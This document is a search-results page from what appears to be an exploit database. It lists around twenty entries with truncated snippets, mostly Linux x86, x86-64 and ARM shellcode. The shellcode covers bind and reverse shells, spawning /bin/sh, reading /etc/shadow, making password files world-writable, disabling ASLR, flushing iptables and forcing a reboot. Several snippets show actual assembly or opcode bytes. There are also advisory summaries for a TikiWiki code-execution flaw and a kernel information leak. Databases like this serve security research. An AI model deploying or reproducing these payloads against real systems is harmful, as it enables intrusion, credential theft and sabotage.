3386 matches found
linux/x86-64 bind-shell with netcat 131 bytes
; Title: Shellcode linux/x86-64 bind-shell with netcat ; Author : Gaussillusion ; Len : 131 byte ; Language : asm BITS 64 xor rdx,rdx mov rdi,0x636e2f6e69622fff shr rdi,0x08 push rdi mov rdi,rsp mov rcx,0x68732f6e69622fff shr rcx,0x08 push rcx mov rcx,rsp mov rbx,0x652dffffffffffff shr rbx,0x30...
linux/x86 - Force Reboot () 57 Bytes
This ShellCode Force to Reboot / 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 x Official Website:...
linux/x86-64 - small novelty Happy B-day HKM shellcode 50 bytes
-= Happy B-day 'HKM' Shellcode 50 bytes -= Platform: Linux x8664 -= Author: nitr0us - http://twitter.com/nitr0usmx -= Date: XX/Sept/2012 | | | | | \ | | | | | | | | | || | | | | | | | | | | | | | |/ | ' | ' | | | | | / |/ | | | | | | | | | | | | | | | | | | | | || | | | | | | | | || | || || || ||...
Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure
/ source: https://www.securityfocus.com/bid/55855/info The Linux kernel is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. / / Test for UNAME26 personality uname kernel stack leak...
Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)
Linux/x86-64 - Bind TCP 31337/TCP Shell Shellcode 150 bytes. Shellcode exploit for Linuxx86-64 platform / Title : tcpbindshell 150 bytes Date : 04 October 2013 Author : Russell Willis Testd on: Linux/x8664 SMP Debian 3.2.46-1+deb7u1 x8664 GNU/Linux $ objdump -D tcpbindshell -M intel tcpbindshell:...
Golden Al-Wafi Translator 1.12 (.waf) Local Crash PoC
Exploit for windows platform in category dos / poc !/usr/bin/python 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS,...
Raspberry Pi Linux/ARM - chmod"/etc/shadow", 0777 41 bytes
Raspberry Pi Linux/ARM - chmod"/etc/shadow", 0777 41 bytes. Shellcode exploit for arm platform / Title: Linux/ARM - chmod"/etc/shadow", 0777 - 41 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l Author: midnitesnake 00008054 : 8054: e28f6001 add r6, pc, 1 8058: e12fff16 bx r6 805c: 4678 mov r0,...
linux/ARM - chmod("/etc/shadow", 0777) - 41 bytes
/ Title: Linux/ARM - chmod"/etc/shadow", 0777 - 41 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l Author: midnitesnake 00008054 : 8054: e28f6001 add r6, pc, 1 8058: e12fff16 bx r6 805c: 4678 mov r0, pc 805e: 3012 adds r0, 18 8060: 21ff movs r1, 255 ; 0xff 8062: 31ff adds r1, 255 ; 0xff 8064:...
Raspberry Pi Linux/ARM - execve"/bin/sh", 0, 0 vars 30 bytes
Raspberry Pi Linux/ARM - execve"/bin/sh", 0, 0 vars 30 bytes. Shellcode exploit for arm platform / Title: Linux/ARM - execve"/bin/sh", 0, 0 vars - 30 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l Author: midnitesnake 00008054 : 8054: e28f6001 add r6, pc, 1 8058: e12fff16 bx r6 805c: 4678 mov...
linux/ARM - execve("/bin/sh", [0], [0 vars]) - 30 bytes
/ Title: Linux/ARM - execve"/bin/sh", 0, 0 vars - 30 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l Author: midnitesnake 00008054 : 8054: e28f6001 add r6, pc, 1 8058: e12fff16 bx r6 805c: 4678 mov r0, pc 805e: 300a adds r0, 10 8060: 9001 str r0, sp, 4 8062: a901 add r1, sp, 4 8064: 1a92 subs...
linux/ARM - reverse_shell(tcp,10.1.1.2,0x1337) execve("/bin/sh", [0], [0 vars]) - 72 bytes
/ Title: Linux/ARM - reverseshelltcp,10.1.1.2,0x1337 execve"/bin/sh", 0, 0 vars - 72 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l - Raspberry Pi Author: midnitesnake 00008054 : 8054: e28f1001 add r1, pc, 1 8058: e12fff11 bx r1 805c: 2002 movs r0, 2 805e: 2101 movs r1, 1 8060: 1a92 subs r2,...
TikiWiki unserialize() Function Arbitrary Code Execution
The version of the TikiWiki installed on the remote host contains a flaw that could allow a remote attacker to execute arbitrary code. The 'unserialize' function is not properly sanitized before being used in the 'lib/banners/bannerlib.php', 'tiki-printmultipages.php', 'tiki-sendobjects.php' and...
UBUNTU-CVE-2012-3421
The pduread function in pdu.c in libpcp in Performance Co-Pilot PCP before 3.6.5 does not properly time out connections, which allows remote attackers to cause a denial of service pmcd hang by sending individual bytes of a PDU separately, related to an "event-driven programming flaw."...
linux/x86 - [setreuid()] -> [/sbin/iptables -F] -> [exit(0)] - 76 bytes
/ Author: Sh3llc0d3 Environment: Linux/x86 Developed from: GNU ASM AT&T Syntax Purpose: setreuid - /sbin/iptables -F - exit0 Size: 76 bytes Website: root-exploit.com / char code = "\xeb\x33\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x5e\x31\xc0\x88\x46"...
Linux x86 - chmod 666 /etc/passwd & /etc/shadow 57 bytes
Linux x86 - chmod 666 /etc/passwd & /etc/shadow 57 bytes. Shellcode exploit for linx86 platform / Title: Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes Author: Jean Pascal Pereira Web: http://0xffe4.org Disassembly of section .text: 08048060 : 8048060: 31 c0 xor %eax,%eax 8048062: 66 b9...
Linux x86 - ASLR deactivation 83 bytes
Linux x86 - ASLR deactivation 83 bytes. Shellcode exploit for linx86 platform / Title: Linux x86 ASLR deactivation - 83 bytes Author: Jean Pascal Pereira Web: http://0xffe4.org Disassembly of section .text: 08048060 : 8048060: 31 c0 xor %eax,%eax 8048062: 50 push %eax 8048063: 68 70 61 63 65 push...
linux/x86 - Shellcode execve ("/bin/sh") - 21 Bytes
/ Title: linux/x86 Shellcode execve "/bin/sh" - 21 Bytes Date : 10 Feb 2011 Author : kernelpanik Thanks : cOokie, agix, antrhacks / / xor ecx, ecx mul ecx push ecx push 0x68732f2f ;; hs// push 0x6e69622f ;; nib/ mov ebx, esp mov al, 11 int 0x80 / include include char code =...
linux/x86 - execve(/bin/cat, /etc/shadow, NULL) - 42 bytes
/ Title: linux/x86 execve/bin/cat, /etc/shadow, NULL - 42 bytes Type: Shellcode Author: antrhacks Platform: Linux X86 / / ASSembly 31 c0 xor %eax,%eax 50 push %eax 68 2f 63 61 74 push $0x7461632f 68 2f 62 69 6e push $0x6e69622f 89 e3 mov %esp,%ebx 50 push %eax 68 61 64 6f 77 push $0x776f6461 68 2...
linux/x86 - execve(/bin/dash) - 49 bytes
/ Shellcode length: 49 Author: Chroniccommand /bin/dash My first attempt at shellcode Poison security / include //49 bytes char shellcode = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a" "\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d" "\x56\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f"...
linux/x86 - setreuid (0,0) & execve("/bin/zsh", ["/bin/zsh", NULL]) + XOR encoded 53 bytes
Title: Linux x86 setreuid 0,0 & execve"/bin/zsh", "/bin/zsh", NULL + XOR encoded - 53 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Jonathan Salwan, Yuda Prawira and Rizki Wicaksono from ctypes import shell =...